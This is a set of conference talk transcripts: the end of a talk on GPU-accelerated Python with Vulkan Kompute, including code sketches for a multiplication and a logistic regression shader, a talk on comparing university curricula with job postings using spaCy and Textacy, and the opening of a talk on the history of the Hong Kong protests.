you can also have what in the compute world is referred to as an algorithm, and an algorithm abstracts the concept of the pipeline, the Vulcan pipeline, the, the the nodes, and the specific shader code that then you can actually say well I want to run this, this code in the GPU with this specific data structures, and I want to run it in this type of way. Right so we will see what that actually looks like in more practical terms. But this is basically it right there's there's, there's not much more around this, and there is an almost one to one mapping between the compute components and the Vulcan and the explicit to reduce ambiguity. Now let's see what that looks like. So, in Python, you would basically create a simple manager, right, you would then create a set of tensors with, you know you can pass non pi arrays or Python lists. It's basically just to tensors that are going to be used in a multiplication and then the output where we're going to save all of the results. 
Right, so that's what we're going to use. You normally would initialize the tensors explicitly, but there's a set of helper functions that take your CPU host memory list and then copy it into GPU-only memory, so all of this is handled for you. But again, it's not handled through magic: every single thing can be accessed, and you can call those things yourself if you wish to, which is very important for several optimizations. Then we're going to define the shader code. This is basically the code that you're going to be running in the GPU; in this case it's just a simple multiplication, written using the pyshader decorator. We have the first buffer and the second buffer, we run a multiplication and store the result in the output. That's basically it; this is going to run in the GPU. We're going to run it through the Manager, so we're going to say: we want to run this synchronously, using these three tensors and using this shader. We can just pass that in and it runs synchronously; we can also run it asynchronously, and we can do a lot of optimizations which we're not going to delve into here. Once it's finished running, you can copy the data back, making sure that the output is now visible in the CPU, and then you can print it, so you can see that our output is 2, 4, 6. That's basically it. That's all there is to it, and this is all you need in order to do all of the crazy stuff that happens underneath. But again, all of that crazy stuff is really interesting, and it is also very useful, very rich and very relevant once you start doing optimizations. So, ultimately: not to hide but to augment. This is the key thing. Now let's actually delve into some of those optimizations that I've been mentioning. What we did just now was run a single command or operation through the manager: the CPU was running, we submitted that operation, we waited, then we came back; we then submitted the second one and came back again. What we can do as well is reuse multiple sequences, which means that we can pre-record commands. We can record a bunch of operations and then run them, so the CPU just triggers the execution: you run specific operations that have already been recorded in the GPU, and then wait until the result comes back. You can also run asynchronous batches or submissions of the commands, which means that you don't have to wait for the GPU to finish: you can submit work, the CPU can continue doing other things while the GPU is busy, and then you can submit more work asynchronously and do something else in between. There's also an await function that allows you to wait for the work to finish. And then finally, something that we're not covering in this presentation but that is also very interesting, is that you can leverage GPU hardware concurrency to submit multiple batch operations that execute in different GPU queues and can then potentially run in parallel. This is dependent on the hardware properties of your GPU and its queue families.
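To make this concrete, here is a rough sketch of the multiplication example and the pre-recorded, asynchronous sequence pattern just described. It follows the general shape of the kp Python package together with the pyshader decorator mentioned in the talk, but the method names have changed across Kompute releases, so treat the exact calls below as an approximation rather than the talk's verbatim code.

import kp
import numpy as np
from pyshader import python2shader, f32, ivec3, Array

# the "piece of C code that runs on the GPU", written in Python via the pyshader decorator
@python2shader
def compute_multiply(index=("input", "GlobalInvocationId", ivec3),
                     data_a=("buffer", 0, Array(f32)),
                     data_b=("buffer", 1, Array(f32)),
                     data_out=("buffer", 2, Array(f32))):
    i = index.x
    data_out[i] = data_a[i] * data_b[i]

mgr = kp.Manager()  # owns the logical device and the queue

tensor_a = mgr.tensor(np.array([2, 2, 2], dtype=np.float32))
tensor_b = mgr.tensor(np.array([1, 2, 3], dtype=np.float32))
tensor_out = mgr.tensor(np.array([0, 0, 0], dtype=np.float32))
params = [tensor_a, tensor_b, tensor_out]

algo = mgr.algorithm(params, compute_multiply.to_spirv())

# one-shot, synchronous run: copy to GPU, dispatch the shader, copy the result back
seq = mgr.sequence()
seq.record(kp.OpTensorSyncDevice(params))
seq.record(kp.OpAlgoDispatch(algo))
seq.record(kp.OpTensorSyncLocal([tensor_out]))
seq.eval()
print(tensor_out.data())  # expected: [2. 4. 6.]

# the same pre-recorded sequence can be replayed, or submitted asynchronously
seq.eval_async()  # the CPU is free to do other work here
seq.eval_await()  # block until the GPU has finished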
To give a concrete example, on my NVIDIA 1650 I have the ability to run hardware-concurrent batches of GPU workloads if I submit them to one compute-family queue and one graphics-family queue. We're not going to delve into that, but if you're interested, there's a lot of really relevant content in the documentation, as well as in the other talk mentioned earlier. But today we're going to be covering something that delves into the world of machine learning. And what better thing to cover than the hello world of machine learning, logistic regression: basically taking a specific data point and classifying it as either true or false. In this case it is just a binary classification, and we're going to be letting the machine do the learning in the GPU. So what are we going to be doing, in terms of intuition? We're going to have input data, which is going to look like two numbers, that goes through our machine learning model and produces a prediction, which ultimately should be what we are expecting. The training data that we're going to be using looks like this: when we see zero and zero we expect zero, when we see zero and one we expect one, when we see one and one we expect one, and we have a bunch of training data points that look like this. Extremely simple, I know, but it's just to make sure that the intuition comes through, as opposed to the machine learning; I mean, this is not a machine learning talk. What we want to do is train a machine learning model, basically learn the parameters that allow us to ensure that every time we see these inputs, we produce the respective outputs. There is a more in-depth blog post that covers the underlying functions and the way that everything is broken down, but we're going to skim through some of that, and if you're curious you can delve into it. We're still going to talk about what's actually happening. We're going to be trying to find the parameters of this function. This is going to be the input, basically that specific x1 and x2 that you saw. In this case, because we want to leverage the hardware's parallel capabilities, we're going to be able to submit multiple inputs as micro-batches, so instead of running them one by one we're going to be doing five at the same time; the GPU runs five and then comes back to us. That's how we're going to be able to do this. We're going to be learning these two parameters, w and b, and this is the function that calculates the prediction. We're not going to delve too much into the depths, but there's a blog post that covers this in a bit more detail, and there are thousands of talks about logistic regression in Python, so you're more than welcome to check those out. The key thing here is that this will be the shader code that we're going to be writing, and even though we're not going to cover it in much detail, we're still going to be looking at what is actually required to write it.
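Since the function itself only appears on the slides, here is the standard logistic regression prediction and gradient step in plain NumPy, which is essentially what gets computed for each data point on the GPU; the variable names are mine, not the ones used in the talk or the blog post.

import numpy as np

def sigmoid(z):
    # squashes any real number into the (0, 1) range
    return 1.0 / (1.0 + np.exp(-z))

def predict(x, w, b):
    # x: the input pair (x1, x2), w: the two weights, b: the bias
    return sigmoid(np.dot(w, x) + b)

def gradient_step(x, y, w, b, learning_rate=0.1):
    # one gradient descent update for a single (x, y) pair under binary cross-entropy loss
    y_hat = predict(x, w, b)
    dw = (y_hat - y) * x  # gradient with respect to the weights
    db = y_hat - y        # gradient with respect to the bias
    return w - learning_rate * dw, b - learning_rate * db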
And then there is the Kompute side. That is the shader, but the Kompute side is what is going to be running it: we're going to have to create a bunch of tensors that represent our input data, our parameters, our predictions, the training data and so on; we're going to initialize those tensors; in the sequence we're going to initialize the algorithm and record it; and then we're going to iterate and learn, let the machine do the learning. So we're going to be running multiple iterations over that data set, updating the parameters every single time, running micro-batches that execute in the GPU in parallel. Once we have iterated those 100 times, we will have learned those parameters. That's basically the high-level logic, and again, this is just an intuition; the key thing here is to see what's happening on the Kompute side and on the shader side. The shader itself is just a more complex version of what we saw earlier. We have all of the inputs: xi, which is x1 and x2, and each of them is an array because we are working with micro-batches. We have the expected outputs, we have the weights that come in, and we have the weights that come out once calculated; remember that the parameters we're learning are w and b, so those are the things that we actually want to get out. We're also taking out the loss, to be able to reuse it where relevant, and the number of data points to use. So in this case we take the specific input weights that come in on every execution; these are the parameters that we update in each execution, so we have to pass them in every single time. We calculate the function, which is basically the function we just saw (in the blog post I break down each of these steps in very minute detail), and we output the updated parameters as well as the respective loss. The key thing here is that we are ultimately able to get out the newly calculated parameters.
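To give a flavour of what such a shader can look like, here is a hand-written GLSL version of a logistic regression kernel along the lines just described, with one invocation per sample in the micro-batch. The buffer layout and names are my own approximation; the actual example in the repository is built with the pyshader decorator and may structure its inputs and outputs differently.

logistic_regression_shader = """
#version 450
layout (local_size_x = 1) in;

// inputs: the micro-batch of samples and the current parameters
layout (set = 0, binding = 0) buffer bufXI   { float x_i[]; };   // first feature
layout (set = 0, binding = 1) buffer bufXJ   { float x_j[]; };   // second feature
layout (set = 0, binding = 2) buffer bufY    { float y[]; };     // expected outputs
layout (set = 0, binding = 3) buffer bufWIn  { float w_in[]; };  // w1, w2
layout (set = 0, binding = 4) buffer bufBIn  { float b_in[]; };  // bias

// outputs: per-sample contributions and loss, copied back to the host each iteration
layout (set = 0, binding = 5) buffer bufWOutI { float w_out_i[]; };
layout (set = 0, binding = 6) buffer bufWOutJ { float w_out_j[]; };
layout (set = 0, binding = 7) buffer bufBOut  { float b_out[]; };
layout (set = 0, binding = 8) buffer bufLOut  { float l_out[]; };

void main() {
    uint idx = gl_GlobalInvocationID.x;  // one invocation per sample in the micro-batch
    float z = w_in[0] * x_i[idx] + w_in[1] * x_j[idx] + b_in[0];
    float y_hat = 1.0 / (1.0 + exp(-z));                       // sigmoid prediction
    float d_z = y_hat - y[idx];
    w_out_i[idx] = d_z * x_i[idx];                             // contribution to the w1 update
    w_out_j[idx] = d_z * x_j[idx];                             // contribution to the w2 update
    b_out[idx]   = d_z;                                        // contribution to the b update
    l_out[idx]   = -(y[idx] * log(y_hat) + (1.0 - y[idx]) * log(1.0 - y_hat));
}
"""
# compiled to SPIR-V and passed to the Kompute algorithm, as in the multiplication sketch earlier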
Right, so now on the Kompute side, we first create all of the specific tensors. As we saw, we have some training data: zero and zero should be zero, zero and one should be one, one and one should be one, and so on. Then this is how we start with our weights: we start with just a random initialization, which we then iterate from. We similarly start with an initial value for our other parameter, the bias, which is going to be zero. And then the number of data points is going to be the actual size of these inputs, so we're going to start with five. We store all of that in a variable called parameters so we can reference them. We then initialize everything by creating our Manager and initializing the tensors; what this does is initialize them explicitly, whereas before we did it implicitly with that utility function, so we initialize all of the parameters in the GPU so that they're accessible in GPU memory. Then we create and record the operations in the sequence. So what are the operations? We first record a sync of the data to the device for these two tensors, because remember the parameters are going to be updated every iteration, so they need to be in GPU device memory. We then record the algorithm that we just wrote, which is the logistic regression shader that you saw, so we record that execution, and then we record a sync to local: we record, for the weights, the bias and the loss, that they should be copied back to the host so that Python can see them. And then finally we iterate 100 times: on every iteration we run the sequence, which is basically all of the things that we just recorded, and then we update all of the weights. I think there's an indentation missing here, but basically what is happening is that we're just updating the parameters by the specific learning rate, which is just how fast we want the parameters to be updated on each iteration. Again, the key thing here is just to see all of the features that you're able to use with Kompute, leveraging a simple machine learning use case as an example. And of course we're skimming through the concepts; sorry for that, for the people who may be watching this and thinking, well, actually that's not 100% correct, but in the blog post I break it down in much more detail. This is just to show how you're able to interact with the GPU, and optimize in different areas by pre-recording components using the sequence, and so on. So in this case we're just iterating. Once it's finished, you're able to just print the calculated parameters, which in this case are the learned weights and the bias b, which is ultimately what we ended up with. And so, to emphasize, we covered this as a high-level example, but as I mentioned we have blog posts that cover it, one in Python and one in C++, breaking it down in minute detail, and we have other tutorials and examples that cover how to use the C++ interface, as opposed to the Python one, for integrating with your Android apps, as well as with game engines like the Godot engine, which we would recommend checking out. So more than anything, what I recommend is to get involved. If you go to github.com slash EthicalML slash vulkan-kompute, you'll be able to check out some of the open issues; you can take one of the issues labelled good first issue. And there is also issue number 52, which is open for general discussion, so if you have ideas for improvements, or questions, you can just post them in the chat, and we've had some really interesting suggestions.
So, the key things in the roadmap: one of the main motivations to build this framework is to actually integrate it as a backend of an existing scientific computing framework, one that is potentially even being used for mobile machine learning or for other types of use cases, so that's definitely really interesting, and if someone is running a scientific computing library, we'd be open to exploring that. Also, creating more default operations, something like a fast Fourier transform or a parallel sum reduction; things like that would be really cool to have as out-of-the-box operations, perhaps even written in C++ but also exposed through the module. And then also adding examples: if you try this with a new sort of shader, or a new sort of algorithm, a new type of machine learning model, we would love for you to contribute it upstream and add it to the repo, because I think that would be very cool. And so that's it. I think that's everything that we had to cover today. Thank you very much for joining this talk on Beyond CUDA: GPU accelerated Python on cross-vendor graphics cards with Vulkan and Kompute. And I would like to take this opportunity to explore and hear your thoughts, ideas and suggestions. And if you have any questions, please feel free to reach out. Thank you very much.
This talk will provide practical insights on high performance GPU computing in Python using the Vulkan Kompute framework. We will cover the trends in GPU processing, the architecture of Vulkan Kompute, we will implement a simple parallel multiplication example, and we will then dive into a machine learning example building a logistic regression model from scratch which will run in the GPU.
10.5446/53300 (DOI)
Hello everyone. My name is Gajendra Deshpande. I'm working as an assistant professor at KLS Gogte Institute of Technology, India. Today I will be delivering a talk on inventing curriculum using Python and spaCy. This project was supported by Google Cloud under the GCP research program. In today's talk we will discuss curriculum and its basic definition, then text summarization, then two Python libraries which are widely used for NLP tasks, that is, spaCy and Textacy, then our experiment, and finally the conclusion. So let us first define the term curriculum. These were a few definitions listed on the University of Delaware website. Curriculum is nothing but a course of study that will enable the learner to acquire specific knowledge and skills. A curriculum is the combination of instructional practices, learning experiences, and student performance assessments that are designed to bring out and evaluate the target learning outcomes of a particular course. It is a selection of information segregated into disciplines and courses, typically designed to achieve a specific educational objective. A curriculum is the program of instruction. It should be based on both standards and best-practice research. It should be the framework that teachers use to plan instruction for their students. Curriculum can be both written and unwritten, but in our experiment we are focusing on the written curriculum. On this page you are seeing the structure of an undergraduate engineering program in India. This was defined by AICTE, that is, the All India Council for Technical Education, which is the highest body that defines the standards and the model curriculum for engineering and diploma courses in India. If you look at the syllabus here, at the content, you can see that it's a combination of different types of courses. For example, we have humanities and social science courses, basic science courses, then engineering science courses, professional core courses and professional elective courses. Then there are some open subjects, there is project work, and there are some mandatory courses. So different types of courses have been included to prepare students for better career options. Now on this page you are seeing the sample curriculum for one subject, the web technology subject. If you see the content here, it has been divided into a few units. In the first few units, the student will learn the introductory concepts. Then in the next few units, that is in units 3, 4 and 5, he'll learn the basics of HTML, JavaScript, CSS and XML, and finally a server-side scripting language, that is PHP. Now let us compare this syllabus with the job requirements. On this page you can see a typical job description given on the indeed.co.in website, and you can see the qualifications section. In the qualifications section it is mentioned that apart from HTML, CSS and JavaScript, there are other things required, namely jQuery and Bootstrap. So clearly this is missing from our syllabus. Now let us compare it with another job opening, this time for a full stack web developer. Again, if you see here, Bootstrap and Material UI are missing, then on the server side Python, Go and Java are missing. There are also some technologies mentioned here such as React, Angular, Vue and Webpack. Again these things are missing from the syllabus.
So clearly it shows that there is a gap, a large gap, between the syllabus set by the university and the job descriptions given by employers. So now let us discuss the next concept, that is text summarization. In text summarization, what we do is shorten long pieces of text by applying computational methods. We use some statistical techniques: we count the word frequency, then we compute the sentence scores, then we pick the sentences which have high scores. That is how the summary is generated from a long piece of text. Now, there are two types of text summarization techniques. One is extractive summarization and the second one is abstractive summarization. If you see the diagram on the right-hand side, the first part, there are three blocks. In the first block there is a text which is divided into sentences, numbered from sentence one to sentence n. Then we apply some computational methods and we get the summary. When we get the summary, it will basically be a subset of the original text. Next, if you observe the bottom diagram, in this case again we have a text which is represented by n sentences, but this time it is abstractive. Again a summary will be generated, but in this case it is not just a subset of the original text; new sentences are generated as well. Now, the concept which we are going to discuss is the pointer-generator network, which is nothing but the combination of extractive and abstractive summarization techniques. We apply the extractive summarization technique to get the pointers, and based on these pointers, new text or new information is generated using abstractive summarization techniques. So that is a pointer-generator network in simple terms. Each of these techniques, both extractive and abstractive, has its own advantages and disadvantages. For example, the extractive summarization technique is fast, but it may not give you accurate results because it just gives you a subset of the sentences, so it may not form a context. In the case of abstractive summarization techniques, it takes a bit of time but it gives more realistic results. Now, in our experiment we have followed these steps. In the first step we created a dataset of job postings from various job portals like indeed.co.in, Stack Overflow and other websites. In the next step we removed unwanted stop words, numbers, punctuation marks and unrelated words. Note here that removing unrelated words is also important, because they just don't form a context and there is no point in processing those words, so you need to remove those unrelated words as well. For example, the location and the salary package are unrelated words for our experiment. The next step is to organize words and sentences. Once you organize words and sentences, you need to compute the word frequency and the sentence score. When you are computing word frequency, you also need to perform n-gram analysis. An n-gram is nothing but n words occurring together. For example, a bigram is two words occurring together, a trigram is the frequency of three words occurring together, and so on. Next, select sentences with high scores and concatenate them. Then sort the words in descending order of frequency, that is, highest first.
We need to extract the top n sentences and top n words, so we are going for the highest first. Then extract the top n words and also the word combinations from the previous step and compare them with the syllabus of a particular subject. Now here there are two possibilities. The first possibility is refining the syllabus of an existing subject with new keywords, and the second one is proposing a new subject. If there are not many changes then we can directly adopt them, so we can go for refining. If there are lots of changes, and if it is not possible to include them in one subject, then we may have to divide the subject into one or more subjects. Now let's discuss the spaCy library. spaCy is an industrial-strength NLP library. It is a free, open-source library for advanced natural language processing in Python. spaCy is designed specifically for production use and helps you build applications that process and understand large volumes of text. It can be used to build information extraction or natural language understanding systems, or to preprocess text for deep learning. spaCy is not research software; it's not a platform, and it's not even an API. It's just a Python library which helps us do natural language processing tasks. There are some specific features listed on this slide. The first one is that it performs non-destructive tokenization. It supports 61-plus languages. There is named entity recognition support. It also provides 46 statistical models for 16 languages, state-of-the-art speed, easy deep learning integration, part-of-speech tagging, labelled dependency parsing, syntax-driven sentence segmentation, and built-in visualizers for syntax and NER. These are some of the features of spaCy which make it an industrial-strength NLP library. The next is Textacy. What we do in spaCy is some basic processing of the text, but if you need some advanced functionality then you also need to go for Textacy. For example, if you want to perform n-gram analysis then you should go for Textacy, because that support is not available in spaCy; otherwise you have to write the code manually from scratch. That's what we have done in our project. Textacy is a Python library for performing a variety of natural language processing tasks, built on the high-performance spaCy library. With the fundamentals, tokenization, part-of-speech tagging, dependency parsing, etc., delegated to another library, Textacy focuses primarily on the tasks that come before and follow after. If you see some features of Textacy here: access spaCy through convenient methods for working with one or many documents and extend its functionality through custom extensions; automatic language identification for applying the right spaCy pipeline to the text; easily stream data to and from disk in many common formats; clean, normalize and explore raw text before using it with spaCy. It can also tokenize and vectorize documents, and train, interpret and visualize topic models, and so on. Now let us look at the code which we have written, line by line. In the first line we are importing the library, that is spaCy, then we are importing the Counter module from collections, then we have defined a set of unwanted terms; note here that this is just an indicative list of terms which are unwanted for our project. Then next we are loading the language model.
We are loading the English language model, then we have created a dataset which has been stored in the dataset.txt file, which is nothing but the list of job openings and their descriptions. Next the NLP object is created, then we are printing the number of tokens before preprocessing and after preprocessing. Preprocessing is very important: it removes all the unwanted characters, unwanted terms and so on, so that we can perform NLP only on the important terms. In the next statement what we are doing is removing all the stop words, removing all punctuation marks, removing numbers, removing extra spaces, then removing URLs and also removing the emails. So we are removing all the unwanted things. Next we are performing lemmatization. Lemmatization is nothing but the process of converting a word into its root form. For example, if there is a term called checking, then when you convert checking into its root form it will become check. That is, we remove all the prefixes and suffixes from the word. Next we perform a basic task, that is converting the entire text into lowercase characters, because our program will treat uppercase and lowercase characters differently, so it becomes very important for us to bring the text to a common form. So we are converting all the text into lowercase here, then we are removing all the unwanted terms which are defined in the unwanted set above. Then next we are printing the number of tokens after preprocessing, and then we are computing the unigrams, bigrams and trigrams. A unigram is the frequency of a single word, a bigram is the frequency of two words occurring together, and a trigram is the frequency of three words occurring together. Then we are sorting the unigrams, bigrams and trigrams in reverse order. Next we have defined a sample syllabus; again, note here that this is the processed information, we have removed all the unwanted terms, and again this is an indicative list. Then we are counting the number of unigrams found in the syllabus, the number of bigrams found in the syllabus, and the number of trigrams found in the syllabus. Then we are calculating, we are trying to see, how much percent our proposed syllabus is closer to the objective. Note here that we are saying it is closer to the objective; it is not necessarily from the employment perspective. The course may be more research focused, and in that case we should check how much percent it is closer to the research curriculum. If we are focusing more towards industry, then we should see how much percent it is closer towards creating jobs or making the students job ready.
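Here is a condensed sketch of the pipeline just described, using spaCy, Textacy and collections.Counter. The unwanted-terms set, the dataset file and the syllabus string are stand-ins for the ones shown on the slides, so the numbers it prints will not match the slide output discussed next.

import spacy
from textacy import extract
from collections import Counter

UNWANTED = {"salary", "location", "apply"}  # placeholder for the talk's unwanted-terms set

nlp = spacy.load("en_core_web_sm")          # assumes the small English model is installed
doc = nlp(open("dataset.txt").read())       # the collected job postings
print("tokens before preprocessing:", len(doc))

# remove stop words, punctuation, numbers, spaces, URLs and emails; lemmatize and lowercase the rest
tokens = [t.lemma_.lower() for t in doc
          if not (t.is_stop or t.is_punct or t.like_num or t.is_space
                  or t.like_url or t.like_email)
          and t.lemma_.lower() not in UNWANTED]
print("tokens after preprocessing:", len(tokens))

clean_doc = nlp(" ".join(tokens))
unigrams = Counter(tokens)
bigrams = Counter(ng.text for ng in extract.ngrams(clean_doc, 2))
trigrams = Counter(ng.text for ng in extract.ngrams(clean_doc, 3))

# compare the top 10 of each against the (preprocessed) syllabus text
syllabus = "html css javascript xml php web application"  # placeholder syllabus
for name, counts in [("unigrams", unigrams), ("bigrams", bigrams), ("trigrams", trigrams)]:
    top = [term for term, _ in counts.most_common(10)]
    found = [term for term in top if term in syllabus]
    print(name, "found in syllabus:", len(found),
          "-> %.0f%% closer to the objective" % (100 * len(found) / max(len(top), 1)))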
So from each of these we need to extract the top 10 unigrams, bigrams and trigrams. Once that is done, we are checking how many unigrams are found in the syllabus, how many bigrams are found in the syllabus, and how many trigrams are found in the syllabus. As per the output here, it is 5. Now, if we see this screen, it says that the syllabus is 50 percent closer to the objective when we just compare unigrams. When we take bigrams into consideration, it says that the syllabus is 20 percent closer to the objective. What this indicates is that if you consider individual concepts, then it is 50 percent closer; if we consider multiple concepts occurring together, that is, if we are going for full stack or a combination of technologies, then it is only 20 percent closer to the objective. So this gives some hints to the academicians, to the syllabus or curriculum designers, on how they can design a syllabus which is closer to the objective. It may be industry ready, or it may be research focused, or it may be just fundamentals. Then finally the conclusion: to achieve better results using natural language processing, one of the important factors is preprocessing of the document. Using a pointer-generator network we can balance the advantages and disadvantages of extractive and abstractive summarization to get better results. Then we need to experiment with non-professional courses such as arts or humanities, and with languages other than English, such as Indian languages. This is going to make the experiment more interesting. Thank you everyone for attending my talk.
Are you an educator who wants to design and teach an industry-aligned curriculum? Then you have come to the right place. In this talk, we will show how to design a better curriculum using natural language processing libraries in Python, i.e., spaCy and Textacy. The curriculum in general, and the undergraduate curriculum in particular, is one of the most important pillars of an education system. The undergraduate curriculum has two main objectives, i.e., employability and higher education. The greatest challenge in designing an undergraduate curriculum is achieving a balance between employability skills and laying the foundation for higher education. Generally, the curriculum is a combination of core technical subjects, professional electives, humanities, and skill-oriented subjects. We used natural language processing and machine learning packages in Python to build a curriculum design system. The steps to build a curriculum design system are described below: 1. The dataset was built from the job profiles from different job listing websites like stackoverflow.com, indeed.com, linkedin.com, and monster.com, and also from the syllabi of competitive exams and qualifying exams for higher education. 2. On the dataset, we applied natural language processing techniques to identify the subjects and subject content. For natural language processing, we used spaCy, an industrial-strength natural language processing package in Python. 3. To generate syllabus content for a particular subject, a pointer-generator network was used. The pointer-generator network is a text summarization technique that combines extractive and abstractive summarization techniques. The extractive summarization technique extracts keywords from the dataset, whereas the abstractive summarization technique generates new text from the existing text. The pointer-generator network was implemented using the scikit-learn machine learning package in Python. 4. The generated curriculum was then compared with the existing curriculum to get insights like how much percent of the curriculum is industry-oriented and how much percent of the curriculum is aimed at higher education and job-oriented skills. At this step, we used the ROUGE (Recall-Oriented Understudy for Gisting Evaluation) metric to compare the generated curriculum against the reference/proposed curriculum. 5. The above steps can be repeated with modified parameters to get better insights and curriculum. This also gives us an idea of how we can have an evolving curriculum that can help us bridge the gap between industry and academia.
10.5446/53128 (DOI)
Our next talk is going to be translated into German and possibly into French. There is a link you can go to. It's trimmin.c3lingo.org. You can go there for translations. We are about to start the talk called what the world can learn from Hong Kong. It's going to take 90 minutes because apparently we can learn a lot from Hong Kong. So buckle up. It's going to be a long ride. And our speaker, Catherine Tai, is a University of Oxford alumna and a PhD candidate at MIT. So let's welcome Catherine on stage. Let's give her a big round of applause. Hello, everyone. Thanks for coming. Thanks for having me at C3. For starters, I'd also like to thank the brave people who are planning to translate what I'm going to say despite knowing how fast I usually speak. So quick round of applause for the translators over there in the boxes. So my name is Catherine. I'm a PhD student at MIT where I study political science. I also work as a freelance journalist on the side. And in my capacity as a freelance journalist, I, amongst other things, covered the Hong Kong protests over the past seven months, which as you can possibly imagine was quite eventful. I think one important caveat for this talk is I am not originally from Hong Kong. And I think the people who you should probably be listening to, and who I would love to put on the stage, in many cases are people who go to great lengths to protect their own anonymity and to protect their own identity. And so these are people who would not put themselves on the stage. So what I'm going to try to do is tell you, to the best of my ability, the things that I've learned from them and from the people who go out on the streets in protest in Hong Kong. But in general, my talk will be interspersed with references to journalists and some activists in Hong Kong who I recommend you follow, because ultimately they are the ones who know best. So what do I want to do? For starters, because this is 90 minutes, I want to give you a quick heads up. I'm going to give a quick overview of why and how things are happening, so historically and politically. And we will also be showcasing some amazing protest art. And then I want to talk about the incredible strategies that protestors have been using and that they've been using for over half a year now. And that's helped them to essentially keep going for more than half a year in the face of what is truly an incredibly strong government. So also we want to talk about technology because of course it's C3. So it's incredibly important that we recognize the very high tech things that the protestors have been using to defend themselves against the police. Such as catapults. This was recently at the Chinese University of Hong Kong. But seriously, like I said, I'm going to start with some historical political background and then I'm going to move on and explain the political demands and the protest strategies that the protestors have been using. And in the end I'm going to give kind of like a quick preview of what we can maybe expect to happen in the next few years and what you can do to stay informed. So what is happening and why? Can I have light on the audience for a second? I don't know who I talked to about this. Great. So I want to know, I want to get a quick sense of how much people know about Hong Kong's politics. So if you know why the years 97 and 2047 are meaningful for Hong Kong politics, please raise your hand. Wow. Thank you. That's definitely more than I expected. I hope this won't bore you then.
Thanks for the lights. That's fine. Although I actually like seeing the audience, that's quite good. I'm still going to give a quick overview. Some of you may know that Hong Kong was a British colony until 1997. So it was under British colonial rule for more than 100 years. Once the British lease of Hong Kong was up, the British negotiated an agreement with the Chinese government to return Hong Kong to China. Ironically, this event was called the handover, where Hong Kong was literally taken by a colonial power and handed over to a different government. Ironically, also, it's called the return to China because the current Chinese government was not even in power when Hong Kong was last part of what you could consider China. But at this handover event, or before this handover event, the British and the Chinese signed an important document, which was the Sino-British Joint Declaration, which essentially says that the rights and freedoms, including those of the person, of speech, of the press, of assembly, of academic research, and of religious belief will be ensured by law in the Hong Kong Special Administrative Region. Why are they writing something like this? Hong Kong was a colony, but because it was essentially used as a big and important commercial center, it did have a lot of kind of like societal freedoms. So people were able to protest to the extent that colonial law allowed it. And there was, for example, freedom of the press. And there were worries in the UK and also in Hong Kong. A lot of Hong Kongers were extremely worried about this, about what might happen to these freedoms when they would essentially become part of China, which is not democratic, and wasn't a democracy in the 80s or the 90s either. These anxieties were obviously exacerbated by the fact that in 89, the Chinese government suppressed a student protest in Tiananmen Square. Hong Kongers knew about this. And so they were watching from just across the border, and they were looking at the students at Tiananmen in Beijing and they were wondering, is this going to be us next? This whole thing, this whole idea that Hong Kong's freedom will be guaranteed is called one country, two systems. And so the idea is that Hong Kong gets to maintain its own government in some ways, it gets to maintain its own legal system, and it gets to maintain all these political freedoms that in many ways are not guaranteed in mainland China. In addition to that, Hong Kong does not have democracy in the sense that most people understand it. But the Hong Kong Basic Law says that the ultimate aim is the selection of the chief executive, which is the head of government in Hong Kong, by universal suffrage upon nomination by a broadly representative nominating committee in accordance with democratic procedures. So basically this could be read as: there will also be democracy at some point, maybe, depending on how we define all of these terms. So in 97, the Chinese government decided that what Hong Kong is going to get is essentially a government that is basically appointed by Beijing. It's a bit more complicated, but essentially the Hong Kong chief executive is appointed in Beijing. And people get to vote for their parliament, but the parliament can't really come up with laws and say, we want to pass this law.
So they can essentially veto bills that come from the government, but Hong Kongers basically get to elect their opposition in free and fair elections, or part of their opposition, but they do not get to elect their government. So that's where we're starting in 97. I think this is important to understand because while Hong Kong is part of China legally, it has a special status that makes it very different politically. And that's something that became very obvious in the years following the handover as well. Anthony Dapiran, a lawyer who works in Hong Kong, has called the city a city of protest. And you can see this, for example, because since the handover there has been a range of protests, all of them have been political and a lot of them have been in some ways related to China. These are just some examples. One was in 2003, the protest against Article 23, which was an anti-subversion law. It was basically seen as a way for the government to get rid of people who they disagreed with politically. People protested against it and the reform was stalled. In 2012, a lot of students protested against a curriculum reform that people essentially denounced as brainwashing. They said it would paint democracy in a bad light and paint China as too positive. Again, the protest succeeded. There were a range of other protests as well in the 2000s that, for example, protested for maintaining important buildings, what people called Hong Kong heritage. A lot of those unfortunately failed. So there have been ups and downs, but it's in no way the case that Hong Kong wasn't free. People were able to go out on the streets. People went out on the streets in thousands. People had political rallies, such as at a university, as you see in the picture in the background. And then 2014 happened. I'm sure people have seen this. This was the Umbrella Revolution in 2014. I took this picture when I was actually at Occupy Central and I studied for my own midterm exams at the student study center. What had happened was that that promise of maybe democracy that I was talking about earlier, people thought that Beijing had broken it. Because in that year Beijing had essentially published its plan for electoral reform and said that yes, you get universal suffrage, so everyone gets to vote, but we still pick the candidates. So people felt cheated and didn't think that that was what they were owed, and people went into the streets. And people occupied a part of the center of the city for two full months and two full weeks, which was extremely impressive. This is basically one of the major roads in the middle of Hong Kong. It's usually full of cars. You couldn't possibly walk there, but people reclaimed it and made it into a protest village. People built their own institutions, people organized tutoring services. It was an incredible feeling. People, when they were there, were incredibly optimistic and were telling me it will be fine, we just need to work together. And if I asked them how they were going to get democracy, they were like, I don't know how exactly it's going to happen, but it will happen. But what actually happened is that the protest camp was cleared out by police and by the government, and there were fights internally in the democracy movement over how to continue, and so there was a lot of disagreement. And what followed was essentially a long period of political depression, right?
People had been able to bring thousands of people onto the streets. But the government didn't even, except for one conversation, sit down and negotiate with them. One person who I interviewed last year, so almost two years ago now, told me at the time that if the government doesn't even listen to us when we bring so many people out on the streets, then I don't know what can change anything politically. The one thing that Umbrella has taught me is that there are no bounds to how disappointed I can be in my government. In addition to this feeling of depression, you had several other incidents that made people feel like the promise of one country, two systems, that Hong Kong would really be separate from mainland China at least until 2047, wasn't being kept. One of these examples is the bookseller abductions from 2015. There were three booksellers who were abducted, probably by the Chinese government, one in Thailand, one in southern China and one in Hong Kong itself. So these are people who were essentially selling books that were, honestly, a lot of it was probably rumors and kind of gossip, but they were very critical of the Chinese government. And they suddenly turned up in China again. So imagine you're a Hong Konger and you've grown up in a city where you're being told you have your own legal system and you have nothing to fear from China, because as long as you don't go there, it's your own government that is in charge of you. But then you hear about these people who are grabbed off the street in your own hometown and who suddenly turn up in China, possibly making a public confession. So that looks bad. In 2016, and this is also important, the Fishball Revolution happened, which is also where this beautiful piece of art comes from. The Fishball Revolution was a protest in a part of Hong Kong called Mong Kok. And basically what happened was that people decided that violent means might be what is needed to oppose the government and get political change. In 2014, people had been peaceful and they had tried, but nobody 